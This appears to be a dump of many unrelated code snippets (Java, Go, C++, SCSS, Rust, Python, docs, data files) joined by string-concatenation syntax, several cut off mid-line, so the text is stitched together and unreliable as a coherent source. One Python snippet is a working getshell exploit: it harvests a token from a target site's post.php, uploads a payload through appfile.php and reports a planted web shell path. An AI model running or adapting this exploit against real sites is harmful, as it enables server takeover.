-> None:\n \"\"\"\n Make sure we're not executing as root, because America is strong\n :return:\n \"\"\"\n if os.name != 'nt' and os.geteuid() == 0:\n raise Utils.SystemException('root')\n\n @staticmethod\n def no_pc() -> None:\n \"\"\"\n Make sure the currently-running OS is not Windows, because we're not PC\n :return:\n \"\"\"\n if os.name == 'nt':\n raise Utils.SystemException('os');\n\n @staticmethod\n def boycott_apple() -> None:\n \"\"\"\n Boycott all Apple products until such time as Apple gives cellphone\n info to authorities regarding radical Islamic terrorist couple from" +"package com.tencent.mm.pluginsdk.ui.tools;\n\nimport android.content.Context;\nimport com.tencent.mm.sdk.platformtools.u;\nimport java.util.ArrayList;\nimport java.util.List;\n\npublic final class p\n{\n private static List iTp = new ArrayList();\n \n public static void a(a parama)\n {\n if (parama != null)\n {\n u.d(\"!44@/B4Tb64lLpJLnjolkGdCefwLG6QT9EqvNAxO7Tr/+58=\", \"add, plugin name = \" + parama.getName());\n if (!iTp.contains(parama)) {\n iTp.add(parama);\n }\n }\n }\n \n public static List aOo()\n {\n return iTp;\n }\n \n public static void clear()\n {\n u.d(\"!44@/B4Tb64lLpJLnjolkGdCefwLG6QT9EqvNAxO7Tr/+58=\", \"clear\");\n iTp.clear();\n }\n \n public static abstract interface a\n {\n public abstract void aNM();\n \n public abstract void aNN();\n \n public abstract void cz(Context paramContext);\n \n public abstract String getName();\n }\n}\n\n/* Location:\n * Qualified Name: com.tencent.mm.pluginsdk.ui.tools.p\n * Java Class Version: 6 (50.0)\n * JD-Core Version: 0.7.1\n */" +"[en]\nCMD_MENU = Commands Menu\nCONF_MENU = Configs Menu\nSPE_MENU = Speech Menu\n\n[de]\nCMD_MENU = Men\u00fc > Befehle\nCONF_MENU = Men\u00fc > Konfiguration\nSPE_MENU = Men\u00fc > Sprechen\n\n[sr]\nCMD_MENU = Komandne\nCONF_MENU = Podesavanja\nSPE_MENU = Govorne Komande\n\n[tr]\nCMD_MENU = Komut Menu\nCONF_MENU = Config Menu\nSPE_MENU = Konusma Menusu\n\n[fr]\nCMD_MENU = Menu Commandes\nCONF_MENU = Menu Configurations\nSPE_MENU = Menu Voix/Paroles\n\n[sv]\nCMD_MENU = Kommandomeny\nCONF_MENU = Konfigurationsmeny\nSPE_MENU = Talmeny\n\n[da]\nCMD_MENU = Kommando Menu\nCONF_MENU = Konfigurations Menu\nSPE_MENU = Tale Menu\n\n[pl]\nCMD_MENU = Menu komend\nCONF_MENU = Menu konfiguracji\nSPE_MENU = Menu rozmowy\n\n[nl]\nCMD_MENU = Commandomenu\nCONF_MENU = Configuratiemenu\nSPE_MENU = Spraakmenu\n\n[es]\nCMD_MENU = Menu de Comandos\nCONF_MENU = Menu de Configuracion\nSPE_MENU = Menu de Voz\n\n[bp]\nCMD_MENU = Menu de Comandos\nCONF_MENU = Menu de Configs\nSPE_MENU = Menu de Vozes\n\n[cz]\nCMD_MENU = Menu prikazu\nCONF_MENU = Menu nastaveni\nSPE_MENU = Nastaveni reci\n\n[fi]\nCMD_MENU = Komentovalikko\nCONF_MENU = Saatovalikko\nSPE_MENU = Puhevalikko\n\n[bg]\nCMD_MENU = Menu s komandi\nCONF_MENU = Konfiguracionno menu\nSPE_MENU = Menu za govorene\n\n[ro]\nCMD_MENU = Menu Comenzi\nCONF_MENU = Menu Configuratie\nSPE_MENU = Menu Speech\n\n[hu]\nCMD_MENU = Parancs Men\u00fc" +"package compiler\n\nimport (\n\t\"errors\"\n\n\t\"github.com/twtiger/gosecco/tree\"\n)\n\n// The boolean compiler uses the stack for simplicity, but we could probably do without\n// It generates suboptimal code, expecting a peephole stage after\n// It will always take jump points as arguments\n// Jump points are arbitary types that represents where to jump.\n// All the different boolean situations can be represented using this structure.\n// The conditional compiler is also a boolean compiler\n\ntype booleanCompilerVisitor struct {\n\tctx *compilerContext\n\terr error\n\ttopLevel bool\n\tjt label\n\tjf label\n}\n\nfunc compileBoolean(ctx *compilerContext, inp tree.Expression, topLevel bool, jt, jf label) error {\n\tv := &booleanCompilerVisitor{ctx: ctx, jt: jt, jf: jf, topLevel: topLevel}\n\tinp.Accept(v)\n\treturn v.err\n}\n\nfunc (s *booleanCompilerVisitor) AcceptAnd(v tree.And) {\n\tnext := s.ctx.newLabel()\n\n\tif err := compileBoolean(s.ctx, v.Left, false, next, s.jf); err != nil {\n\t\ts.err = err\n\t\treturn\n\t}\n\n\ts.ctx.labelHere(next)\n\n\tif err := compileBoolean(s.ctx, v.Right, false, s.jt, s.jf); err != nil {\n\t\ts.err = err\n\t\treturn\n\t}\n}\n\n// AcceptArgument implements Visitor\nfunc (s *booleanCompilerVisitor) AcceptArgument(v tree.Argument) {\n\ts.err = errors.New(\"an argument variable was found in a boolean expression - this is likely a programmer error\")\n}\n\n// AcceptArithmetic implements Visitor\nfunc (s *booleanCompilerVisitor) AcceptArithmetic(v tree.Arithmetic) {\n\ts.err =" +"#pragma once\n\n#include <torch/data/transforms/base.h>\n\n#include <functional>\n#include <utility>\n#include <vector>\n\nnamespace torch {\nnamespace data {\nnamespace transforms {\n\n/// A `BatchTransform` that applies a user-provided functor to a batch.\ntemplate <typename Input, typename Output = Input>\nclass BatchLambda : public BatchTransform<Input, Output> {\n public:\n using typename BatchTransform<Input, Output>::InputBatchType;\n using typename BatchTransform<Input, Output>::OutputBatchType;\n using FunctionType = std::function<OutputBatchType(InputBatchType)>;\n\n /// Constructs the `BatchLambda` from the given `function` object.\n explicit BatchLambda(FunctionType function)\n : function_(std::move(function)) {}\n\n /// Applies the user-provided function object to the `input_batch`.\n OutputBatchType apply_batch(InputBatchType input_batch) override {\n return function_(std::move(input_batch));\n }\n\n private:\n FunctionType function_;\n};\n\n// A `Transform` that applies a user-provided functor to individual examples.\ntemplate <typename Input, typename Output = Input>\nclass Lambda : public Transform<Input, Output> {\n public:\n using typename Transform<Input, Output>::InputType;\n using typename Transform<Input, Output>::OutputType;\n using FunctionType = std::function<Output(Input)>;\n\n /// Constructs the `Lambda` from the given `function` object.\n explicit Lambda(FunctionType function) : function_(std::move(function)) {}\n\n /// Applies the user-provided function object to the `input`.\n OutputType apply(InputType input) override {\n return function_(std::move(input));\n }\n\n private:\n FunctionType function_;\n};\n\n} // namespace transforms\n} // namespace data\n} // namespace torch" +"@mixin epl-textfield {\n\tbackground-color: $color-epl-input;\n\tborder: 1px solid $color-epl-input-border;\n\tborder-radius: 4px;\n\tcolor: $color-text;\n\tdisplay: block;\n\tfont-family: inherit;\n\tfont-size: 12px;\n\tline-height: 23px;\n\tpadding: 5px;\n\twidth: $width-epl-module-input;\n\n\t// Placeholder text\n\t&::-webkit-input-placeholder {\n\t\tfont-style: italic;\n\t\tcolor: $color-epl-text-secondary;\n\t}\n\n\t&:-moz-placeholder {\n\t\tfont-style: italic;\n\t\tcolor: $color-epl-text-secondary;\n\t}\n\n\t&.placeholder {\n\t\tfont-style: italic;\n\t\tcolor: $color-epl-text-secondary;\n\t}\n}\n\n// styling for edit area and category select source mode\n@mixin epl-editorarea {\n\tdisplay: block; // Webkit treats textareas as inline elements. Fixes BugId:12664\n\tfont-family: Consolas, \"Eupheima UCAS\", Ayuthaya, Menlo, monospace;\n\tfont-size: 13px;\n\tmargin: 0;\n\tpadding: 0;\n\toutline: none;\n\tresize: none; // No resize grip for Webkit / FF4\n\twidth: 100%;\n}" +"use lyon::tessellation::FillOptions;\n\n/// Nodes that support fill tessellation.\n///\n/// This trait allows the `Drawing` context to automatically provide an implementation of the\n/// following builder methods for all primitives that provide some fill tessellation options.\npub trait SetFill: Sized {\n /// Provide a mutable reference to the `FillOptions` field.\n fn fill_options_mut(&mut self) -> &mut FillOptions;\n\n /// Specify the whole set of fill tessellation options.\n fn fill_opts(mut self, opts: FillOptions) -> Self {\n *self.fill_options_mut() = opts;\n self\n }\n\n /// Maximum allowed distance to the path when building an approximation.\n fn fill_tolerance(mut self, tolerance: f32) -> Self {\n self.fill_options_mut().tolerance = tolerance;\n self\n }\n\n /// Specify the rule used to determine what is inside and what is outside of the shape.\n ///\n /// Currently, only the `EvenOdd` rule is implemented.\n fn fill_rule(mut self, rule: lyon::tessellation::FillRule) -> Self {\n self.fill_options_mut().fill_rule = rule;\n self\n }\n\n /// Whether to perform a vertical or horizontal traversal of the geometry.\n ///\n /// Default value: `Vertical`.\n fn fill_sweep_orientation(mut self, orientation: lyon::tessellation::Orientation) -> Self {\n self.fill_options_mut().sweep_orientation = orientation;\n self\n }\n\n /// A fast path to avoid some expensive operations if the path is known to not have any\n /// self-intersections.\n ///\n /// Do not set this to `false` if" +"===== Stopping a Node\nInstalled nodes are started automatically when the SymmetricDS server is started. An individual node instance can be stopped while other nodes continue to run.\n\nifdef::pro[]\nTo stop a node, select the node you want to stop and click on the *Control* button and choose *Stop*. The node's status will indicate that is has been stopped.\nendif::pro[]\n\nFrom the command line, you can use JMX to stop a node. The following is an example. You would replace <engine name> with the name of the engine as found in the <<Node Properties File>>\n\n`bin/jmx --bean org.jumpmind.symmetric.<engine name>:name=Node --method stop`\n\n===== Uninstalling a Node \n\nUninstalling a node will remove all SymmetricDS database artifacts and delete the engine's property file.\n\nWARNING: This can not be undone so be sure to uninstall with caution.\n\nifdef::pro[]\nTo uninstall a node, select the node you want to uninstall and click on the _Control_ button and choose _Uninstall_.\n\n.Control->Uninstall\nimage::uninstall.png[]\n\nIf the node has no children, you will be prompted by a confirm dialog to make sure you want to uninstall the node.\n\n.Uninstall single node\nimage::uninstall-single.png[]\n\nIf the node has child nodes you will be told that uninstalling the parent node will uninstall" +"\ufeffusing System;\nusing System.Collections.Generic;\nusing System.Text;\nusing IronAHK.Rusty.Linux.X11.Types;\nusing IronAHK.Rusty.Linux.X11;\n\nnamespace IronAHK.Rusty.Linux.Proxies\n{\n /// <summary>\n /// represents a single xwindow - proxy for actions affecting x windows\n /// </summary>\n internal class XWindow\n {\n XWindowAttributes _attributes;\n XDisplay _display = null;\n int _id;\n\n public XWindow(XDisplay display, int window) {\n _display = display;\n _id = window;\n }\n\n /// <summary>\n /// ID of the window\n /// </summary>\n public int ID {\n get { return _id; }\n set { _id = value; }\n }\n\n /// <summary>\n /// Backreference to the XDisplay from this Window\n /// </summary>\n public XDisplay XDisplay {\n get {\n return _display;\n }\n }\n\n public XWindowAttributes Attributes {\n get {\n if(Xlib.XGetWindowAttributes(this._display.Handle, this.ID, ref _attributes) == 0) {\n throw new XWindowException();\n }\n return _attributes;\n }\n }\n }\n\n\n internal class XWindowException : Exception\n {\n //\n }\n}" +"# -*- coding: utf-8 -*-\n\n\"\"\"\nSpell DistanceToNearest obtains the distance to the nearest Point-of-Interest\nor geographic feature. Suppose you want to find the distance to\nthe nearest embassy:\n\n.. code-block:: python\n\n from geomancer.spells import DistanceToNearest\n from tests.conftest import sample_points\n\n # Load sample points\n df = sample_points()\n\n # Configure and cast the spell\n spell = DistanceToNearest(\"embassy\",\n source_table=\"geospatial.ph_osm.gis_osm_pois_free_1\",\n feature_name=\"dist_embassy\")\n\n # Will create a new column, `dist_embassy` with the\n # appropriate features\n df_with_features = spell.cast(df, dburl=\"bigquery://geospatial\")\n\"\"\"\n\n# Import modules\nfrom sqlalchemy import func\nfrom sqlalchemy.sql import select\n\nfrom .base import Spell\n\n\nclass DistanceToNearest(Spell):\n \"\"\"Obtain the distance to the nearest Point-of-Interest or geographic feature\"\"\"\n\n def __init__(self, on, within=10 * 1000, **kwargs):\n \"\"\"Spell constructor\n\n Parameters\n ----------\n on : str\n Feature class to compare upon\n within : float, optional\n Look for values within a particular range. Its value is in meters,\n the default is :code:`10,000` meters.\n source_table : str\n Table URI to run queries against.\n feature_name : str\n Column name for the output feature.\n column : str, optional\n Column to look the geometries from. The default is :code:`WKT`\n options : :class:`geomancer.backend.settings.Config`, optional\n Specify configuration for interacting with the database backend.\n Auto-detected if not set.\n \"\"\"\n super(DistanceToNearest, self).__init__(**kwargs)\n self.source_column, self.source_filter = self.extract_columns(on)\n self.within = within" +"--- deadwood-2.9.03/src/DwDnsStr.c\t2010-08-06 09:41:59.000000000 -0700\n+++ deadwood-2.9.04/src/DwDnsStr.c\t2010-08-09 09:42:07.000000000 -0700\n@@ -528,4 +528,31 @@\n \n }\n \n+/* Convert any upper case letters in a DNS query in to lower case letters;\n+ * This modifies the \"query\" string in place */\n+int dwc_lower_case(dw_str *query) {\n+\tint length = 0, place = 0, counter = 0;\n+\tuint8_t c;\n+\n+\tif(query == 0 || query->len == 0 || query->str == 0) {\n+\t\treturn -1;\n+\t}\n+\n+\tfor(counter = 0 ; counter < query->len ; counter++) {\n+\t\tif(counter == place) {\n+\t\t\tlength = *(query->str + place);\n+\t\t\tif(length == 0) {\n+\t\t\t\tbreak;\n+\t\t\t}\n+\t\t\tplace += length + 1;\n+\t\t} else {\n+\t\t\tc = *(query->str + counter);\n+\t\t\tif(c >= 'A' && c <= 'Z') {\n+\t\t\t\t*(query->str + counter) += 32; /* Lower case */\n+\t\t\t}\n+\t\t}\n+\t}\t\n+\t\t\n+\treturn 1;\n+}\n \n--- deadwood-2.9.03/src/DwDnsStr.h\t2010-08-06 09:41:59.000000000 -0700\n+++ deadwood-2.9.04/src/DwDnsStr.h\t2010-08-09 09:42:07.000000000 -0700\n@@ -67,4 +67,8 @@\n * we got an error */\n int dwc_has_bad_ip(dw_str *answer, dwd_dict *blacklist_hash);\n \n+/* Convert any upper case letters in a DNS query in to lower case letters;\n+ * This modifies the" +"gandi-live-dns\n----\n\nThis is a simple dynamic DNS updater for the\n[Gandi](https://www.gandi.net) registrar. It uses their [LiveDNS REST API](http://doc.livedns.gandi.net/) to update the zone file for a subdomain of a domain to point at the external IPv4 address of the computer it has been run from.\n\nIt has been developed on Debian 8 Jessie and tested on Debian 9 Stretch GNU/Linux using Python 2.7.\n\nWith the new v5 Website, Gandi has also launched a new REST API which makes it easier to communicate via bash/curl or python/requests. \n\n### Goal\n\nYou want your homeserver to be always available at `dynamic_subdomain.mydomain.tld`.\n\n### Debian Package Requirements\n\n`apt-get update && apt-get upgrade && apt-get install unzip python-requests python-args python-simplejson`\n\n#### API Key\nFirst, you must apply for an API key with Gandi. Visit \nhttps://account.gandi.net/en/ and apply for (at least) the production API \nkey by following their directions.\n\n#### A DNS Record \nCreate the DNS A Records in the GANDI Webinterface which you want to update if your IP changes. \n\n#### Git Clone or Download the Script\nDownload the Script from here as [zip](https://github.com/cavebeat/gandi-live-dns/archive/master.zip)/[tar.gz](https://github.com/cavebeat/gandi-live-dns/archive/master.tar.gz) and extract it. \n\nor clone from git\n\n`git clone https://github.com/cavebeat/gandi-live-dns.git` \n\n#### Script Configuration\nThen you'd need to configure the script in the" +"11\n1000 1 1 1 1 1 1 1 1 1 1\n10\n762 1 0 0 0 0 0 0 0 0 0 41\n699 0 1 0 0 0 0 0 0 0 0 164\n585 0 0 1 0 0 0 0 0 0 0 33\n517 0 0 0 1 0 0 0 0 0 0 47\n448 0 0 0 0 1 0 0 0 0 0 131\n434 0 0 0 0 0 1 0 0 0 0 123\n420 0 0 0 0 0 0 1 0 0 0 97\n370 0 0 0 0 0 0 0 1 0 0 163\n364 0 0 0 0 0 0 0 0 1 0 65\n302 0 0 0 0 0 0 0 0 0 1 136" +"\ufeff$Script:ErrorActionPreference = 'Stop'\n\n$exclusions = @(\n 'EventFlow\\Core\\AsyncHelper.cs'\n 'EventFlow\\Core\\HashHelper.cs'\n 'EventFlow\\Logs\\Internals\\ImportedLibLog.cs'\n)\n\n$defaultAuthors = @(\n 'Rasmus Mikkelsen'\n 'eBay Software Foundation'\n)\n\n$files = Get-ChildItem -Path $PSScriptRoot -Directory -Recurse |\n Where-Object { $_.FullName -notmatch '\\\\(bin|obj)(\\\\|$)' } |\n Get-ChildItem -File -Filter *.cs |\n Select-Object -ExpandProperty FullName\n\n$year = [datetime]::Now.Year\n\nfunction IsExcluded([string] $File) {\n foreach ($exclusion in $exclusions) {\n if ($File.EndsWith($exclusion)) { return $true }\n }\n}\n\nfunction CreateCopyright([string] $FromYear, [string] $Name) {\n if ($FromYear -eq $year) {\n \"// Copyright (c) $year $Name\"\n }\n else {\n \"// Copyright (c) $FromYear-$year $Name\"\n }\n}\n\nfunction CreateHeader($Copyrights) {\n @\"\n// The MIT License (MIT)\n// \n$(@($Copyrights | ForEach-Object { CreateCopyright $_.FromYear $_.Name }) -join \"`r`n\")\n// https://github.com/eventflow/EventFlow\n// \n// Permission is hereby granted, free of charge, to any person obtaining a copy of\n// this software and associated documentation files (the \"Software\"), to deal in\n// the Software without restriction, including without limitation the rights to\n// use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of\n// the Software, and to permit persons to whom the Software is furnished to do so,\n// subject to the following conditions:\n// \n// The above copyright notice and this permission notice shall be included in all\n// copies" +"* Broadcom BCM7xxx Ethernet Systemport Controller (SYSTEMPORT)\n\nRequired properties:\n- compatible: should be one of:\n\t \"brcm,systemport-v1.00\"\n\t \"brcm,systemportlite-v1.00\" or\n\t \"brcm,systemport\"\n- reg: address and length of the register set for the device.\n- interrupts: interrupts for the device, first cell must be for the rx\n interrupts, and the second cell should be for the transmit queues. An\n optional third interrupt cell for Wake-on-LAN can be specified\n- local-mac-address: Ethernet MAC address (48 bits) of this adapter\n- phy-mode: Should be a string describing the PHY interface to the\n Ethernet switch/PHY, see Documentation/devicetree/bindings/net/ethernet.txt\n- fixed-link: see Documentation/devicetree/bindings/net/fixed-link.txt for\n the property specific details\n\nOptional properties:\n- systemport,num-tier2-arb: number of tier 2 arbiters, an integer\n- systemport,num-tier1-arb: number of tier 1 arbiters, an integer\n- systemport,num-txq: number of HW transmit queues, an integer\n- systemport,num-rxq: number of HW receive queues, an integer\n\nExample:\nethernet@f04a0000 {\n\tcompatible = \"brcm,systemport-v1.00\";\n\treg = <0xf04a0000 0x4650>;\n\tlocal-mac-address = [ 00 11 22 33 44 55 ];\n\tfixed-link = <0 1 1000 0 0>;\n\tphy-mode = \"gmii\";\n\tinterrupts = <0x0 0x16 0x0>,\n\t\t<0x0 0x17 0x0>;\n};" +"define([\"messages\"], function (Messages) {\n var DepthInspector = React.createClass({\n toggleDepthInspector: function() {\n var data = {\n \"enabled\": this.refs.depthInspector.checked,\n \"range\": {\n \"near\": this.refs.depthInspectorNear.value,\n \"far\": this.refs.depthInspectorFar.value\n }\n };\n Messages.sendMessage(this.props.activeContext, messageType.DEPTH_INSPECTOR, data);\n },\n render: function() {\n return <div className=\"container\">\n <div className=\"heading\">\n Depth Inspector\n </div>\n <div>\n Displays the relative depths of the pixels being drawn. Lighter values are further away whereas darker values are closer.\n </div>\n <div>\n Enable Depth Inspector  \n <input ref=\"depthInspector\" type=\"checkbox\" onClick={this.toggleDepthInspector} />\n </div>\n <div>\n Near: <input ref=\"depthInspectorNear\" type=\"number\" defaultValue=\"1\" onChange={this.toggleDepthInspector} />\n   \n Far: <input ref=\"depthInspectorFar\" type=\"number\" defaultValue=\"1000\" onChange={this.toggleDepthInspector} />\n </div>\n <div>\n Hint: The depth color is interpolated between the near and far value. If only white is displayed, then the far value may be too small. Likewise, if only black is displayed then the far and/or near value may be too large.\n A good strategy to determine the right near and far values for your application is to start with your near and far clipping planes, and adjust accordingly.\n </div>\n </div>;\n }\n });\n return DepthInspector;\n});" +"import { getTopSameDomainWindow, getFrameElement } from '../utils/dom';\nimport nativeMethods from './native-methods';\nimport Sandbox from './index';\n\nconst SANDBOX_BACKUP = 'hammerhead|sandbox-backup';\n\ninterface SandboxBackupEntry {\n iframe: Element;\n sandbox: Sandbox;\n}\n\nfunction findRecord (storage: SandboxBackupEntry[], iframe: Element | null) {\n for (let i = storage.length - 1; i >= 0; i--) {\n try {\n if (storage[i].iframe === iframe)\n return storage[i];\n }\n catch (e) {\n storage.splice(i, 1);\n }\n }\n\n return void 0;\n}\n\nexport function create (window: Window, sandbox: Sandbox) {\n const topSameDomainWindow = getTopSameDomainWindow(window);\n const iframe = window !== topSameDomainWindow ? getFrameElement(window) : null;\n let storage = topSameDomainWindow[SANDBOX_BACKUP];\n\n if (!storage) {\n storage = [];\n nativeMethods.objectDefineProperty(topSameDomainWindow, SANDBOX_BACKUP, { value: storage });\n }\n\n const record = findRecord(storage, iframe);\n\n if (record)\n record.sandbox = sandbox;\n else\n storage.push({ iframe, sandbox });\n}\n\nexport function get (window: Window) {\n const topSameDomainWindow = getTopSameDomainWindow(window);\n const storage = topSameDomainWindow[SANDBOX_BACKUP];\n const iframe = window !== topSameDomainWindow ? window.frameElement : null;\n\n if (storage) {\n const record = findRecord(storage, iframe);\n\n return record ? record.sandbox : null;\n }\n\n return null;\n}" +"// LoopingAndRanges/ForWithRanges.kt\n// (c)2020 Mindview LLC. See Copyright.txt for permissions.\n\nfun showRange(r: IntProgression) {\n for (i in r) {\n print(\"$i \")\n }\n print(\" // $r\")\n println()\n}\n\nfun main() {\n showRange(1..5)\n showRange(0 until 5)\n showRange(5 downTo 1) // [1]\n showRange(0..9 step 2) // [2]\n showRange(0 until 10 step 3) // [3]\n showRange(9 downTo 2 step 3)\n}\n/* Output:\n1 2 3 4 5 // 1..5\n0 1 2 3 4 // 0..4\n5 4 3 2 1 // 5 downTo 1 step 1\n0 2 4 6 8 // 0..8 step 2\n0 3 6 9 // 0..9 step 3\n9 6 3 // 9 downTo 3 step 3\n*/" +".PS\ncct_init(SIdefaults)\nifdef(`m4pco',`resetrgb')\n\nlinethick_(.5)\ndefine(`dimen_', 10)\nelen = dimen_*3/2\n\nOrigin: Here\n T: source(up_ elen, AC) ; llabel(,V_{in},); \"in\" above\n bridge_len = dimen_/2\n W: T.centre + (dimen_/2,0)\n N: W + (bridge_len, bridge_len)\n S: W + (bridge_len, -bridge_len)\n E: S + (bridge_len, bridge_len)\n diode(from W to N)\n diode(from S to E)\n R: resistor(from E + (dimen_,0) down_ dimen_); llabel(+,R_{load},-) # ; \"out\" above\n C: capacitor(down_ R.start.y - R.end.y from 0.5 between E and R.start, C+); rlabel(,C,)\n\n setrgb(1,0,0) # red\n dot(at T.end)\n dot(at C.start)\n line from T.end to (N,T.end) then to N; dot\n diode(to E); dot\n line from E to R.start; dot\n resetrgb\n\n setrgb(0,1,0) # green\n dot(at C.end)\n dot(at R.end)\n ground\n line to (W,Here) then to W; dot\n diode(to S); dot\n line to (Here,T.start) then to T.start; dot\n resetrgb\n\n.PE" +"load ../common\n\nsetup () {\n scope standard\n [[ $CH_BUILDER = ch-grow ]] || skip 'ch-grow only'\n}\n\n@test 'ch-grow common options' {\n # no common options\n run ch-grow storage-path\n echo \"$output\"\n [[ $status -eq 0 ]]\n [[ $output != *'verbose level'* ]]\n\n # before only\n run ch-grow -vv storage-path\n echo \"$output\"\n [[ $status -eq 0 ]]\n [[ $output = *'verbose level: 2'* ]]\n\n # after only\n run ch-grow storage-path -vv\n echo \"$output\"\n [[ $status -eq 0 ]]\n [[ $output = *'verbose level: 2'* ]]\n\n # before and after; after wins\n run ch-grow -vv storage-path -v\n echo \"$output\"\n [[ $status -eq 0 ]]\n [[ $output = *'verbose level: 1'* ]]\n}\n\n@test 'ch-grow list' {\n run ch-grow list\n echo \"$output\"\n [[ $status -eq 0 ]]\n [[ $output = *\"00_tiny\"* ]]\n}\n\n@test 'ch-grow storage-path' {\n run ch-grow storage-path\n echo \"$output\"\n [[ $status -eq 0 ]]\n [[ $output = /* ]] # absolute path\n [[ $CH_GROW_STORAGE && $output = \"$CH_GROW_STORAGE\" ]] # match what we set\n}" +"MODEL 1\nATOM 1 N POPE 1 -2.646 0.841 2.584 0.00 0.00 MEMB N \nATOM 2 HN1 POPE 1 -1.839 0.219 2.374 0.00 0.00 MEMB H \nATOM 3 HN2 POPE 1 -2.809 0.806 3.611 0.00 0.00 MEMB H \nATOM 4 HN3 POPE 1 -3.492 0.456 2.117 0.00 0.00 MEMB H \nATOM 5 C12 POPE 1 -2.396 2.208 2.114 0.00 0.00 MEMB C \nATOM 6 H12A POPE 1 -1.699 2.805 2.739 0.00 0.00 MEMB H \nATOM 7 H12B POPE 1 -3.395 2.694 2.098 0.00 0.00 MEMB H \nATOM 8 C11 POPE 1 -1.788 2.184 0.695 0.00 0.00 MEMB C \nATOM 9 H11A POPE 1 -1.801 3.137 0.125 0.00 0.00 MEMB H \nATOM 10 H11B POPE 1 -2.436 1.530 0.073 0.00 0.00 MEMB H \nATOM 11 P POPE 1 0.336 1.358 -0.715 0.00 0.00 MEMB P \nATOM 12 O13 POPE 1 1.704 0.829 -0.449 0.00 0.00 MEMB O \nATOM 13 O14 POPE 1 0.274 2.675 -1.415 0.00 0.00 MEMB O \nATOM 14 O11 POPE 1 -0.478 0.279 -1.466 0.00 0.00 MEMB O \nATOM 15 O12 POPE 1 -0.453 1.590 0.653 0.00 0.00 MEMB O \nATOM 16 C1 POPE 1 -0.424 -1.121 -1.064 0.00 0.00 MEMB C \nATOM 17 HA POPE 1 -1.234" +"from django.db import models\n\n\nclass FederalAccount(models.Model):\n \"\"\"\n Represents a single federal account. A federal account encompasses multiple Treasury Account Symbols (TAS),\n represented by: model:`accounts.TreasuryAppropriationAccount`.\n \"\"\"\n\n agency_identifier = models.TextField(db_index=True)\n main_account_code = models.TextField(db_index=True)\n account_title = models.TextField()\n federal_account_code = models.TextField(null=True) # agency_identifier + '-' + main_account_code\n parent_toptier_agency = models.ForeignKey(\n \"references.ToptierAgency\",\n models.DO_NOTHING,\n null=True,\n help_text=(\n \"The toptier agency under which this federal account should appear in lists and dropdowns. Not \"\n \"as simple as just mapping the AID to an agency, although AID does factor into the decision.\"\n ),\n )\n\n class Meta:\n managed = True\n db_table = \"federal_account\"\n unique_together = (\"agency_identifier\", \"main_account_code\")\n\n @staticmethod\n def fa_rendering_label_to_component_dictionary(fa_rendering_label) -> dict:\n return {\"faaid\": fa_rendering_label.split(\"-\")[0], \"famain\": fa_rendering_label.split(\"-\")[1]}" +"open Core_kernel\nopen Bap.Std\nopen OUnit2\n\nopen Powerpc_tests_helpers\n\nlet andi_dot arch ctxt =\n let bytes = \"\\x71\\x2a\\x00\\x1F\" in (** andi. r10,r9,31 *)\n let r10 = find_gpr arch \"R10\" in\n let r9 = find_gpr arch \"R9\" in\n let width = arch_width arch in\n let init = Bil.[\n r9 := int (Word.of_int ~width 10);\n ] in\n let expected = Word.of_int ~width 10 in\n check_gpr init bytes r10 expected arch ctxt\n\nlet andis_dot arch ctxt =\n let bytes = \"\\x75\\x2a\\x0E\\x00\" in (** andis. r10,r9,2048 *)\n let r10 = find_gpr arch \"R10\" in\n let r9 = find_gpr arch \"R9\" in\n let width = arch_width arch in\n let value = Word.of_int ~width 0x0800_0000 in\n let init = Bil.[\n r9 := int value;\n ] in\n let expected = value in\n check_gpr init bytes r10 expected arch ctxt\n\nlet and_ arch ctxt =\n let bytes = \"\\x7f\\x39\\xe8\\x38\" in (** and r25 r25 r29 *)\n let r25 = find_gpr arch \"R25\" in\n let r29 = find_gpr arch \"R29\" in\n let width = arch_width arch in\n let x = 31 in\n let y = 10 in\n let r = x land y in\n let init = Bil.[\n r29 := int (Word.of_int ~width x);\n r25 := int (Word.of_int ~width y);" +"# -*- coding: UTF-8 -*- #\nimport os\nimport requests\nimport hashlib\n\nbdlj = os.getcwd()\nheaders = open(bdlj+\"\\headers.txt\",'r')\nheaderss = headers.read()\nprint('\\b')\n\nur = input(\"\u8bf7\u8f93\u5165\u76ee\u6807\u7f51\u5740:\")\nrequrl = ur + '/base/post.php'\nreqdata = {\"act\":\"appcode\"}\nr = requests.post(requrl,data=reqdata)\ncz=r.text[2:34]\nprint ('\u521d\u503c:' + cz)\n\ncz=r.text[2:34]+\"a\"\nm = hashlib.md5()\nb = cz.encode(encoding='utf-8')\nm.update(b)\nzz = m.hexdigest()\nprint ('\u7ec8\u503c:' + zz)\n\ninfile = open(bdlj + \"\\datas.txt\", \"r\",encoding='utf-8')\noutfile = open(bdlj + \"\\datah.txt\", \"w\",encoding='utf-8')\nfor line in infile:\n outfile.write(line.replace('156as1f56safasfasfa', zz))\ninfile.close()\noutfile.close()\ndatas = open(bdlj+\"\\datah.txt\",'r')\ndatass = datas.read()\n\ngs = requests.post(ur + '/base/appfile.php',data=datass,headers={'Content-Type':headerss})\ngs.encoding = 'utf-8'\nprint (gs.text)\n\nif {gs.text == \"OK\"}:\n\tprint (\"Getshell\u6210\u529f! Shell:\" + ur + \"/effect/source/bg/mstir.php\")\nelse:\n\tprint (\"Getsehll\u5931\u8d25!\")" +"const int five = 5;\nint array[five];\n\nclass A\n {\n public:\n enum values { zero, nonzero };\n };\n\ntypedef int PRInt32;\nconst PRInt32 kDefaultStringSize = 64;\nenum eCharSize {eOneByte=0,eTwoByte=1};\nchar mBuffer_1[kDefaultStringSize << eTwoByte];\n\nchar mBuffer_2[kDefaultStringSize << A::zero];\n\n// Note that \"A::nonzero\" will be unparsed as unparsed as \"eTwoByte\"\n// because the types are equivalent. Not sure where this should be \n// fixed or if it might be an EDG issue. I expect that our name\n// mangling is using values for enums rather than names. This is\n// not a critical issue but should be fixed at some point, the \n// resulting code is still correct, but transformations would be\n// an issue.\nchar mBuffer_3[kDefaultStringSize << A::nonzero];" +"package pipe.actions.gui;\n\nimport pipe.controllers.GUIAnimator;\nimport pipe.controllers.PetriNetController;\nimport pipe.controllers.application.PipeApplicationController;\n\nimport java.awt.event.ActionEvent;\n\n/**\n * This action is responsible for firing multiple random enabled\n * transitions when animation mode is on\n */\n@SuppressWarnings(\"serial\")\npublic class MultiRandomAnimateAction extends AnimateAction {\n /**\n * Step backward action, used to set its availability when a step forward has been performed.\n */\n private final GuiAction stepBackwardAction;\n\n /**\n * Main PIPE application controller\n */\n private final PipeApplicationController applicationController;\n\n /**\n * Constructor\n * @param name image name\n * @param tooltip tooltip message\n * @param keystroke shortcut keystroke\n * @param stepBackwardAction step backward action\n * 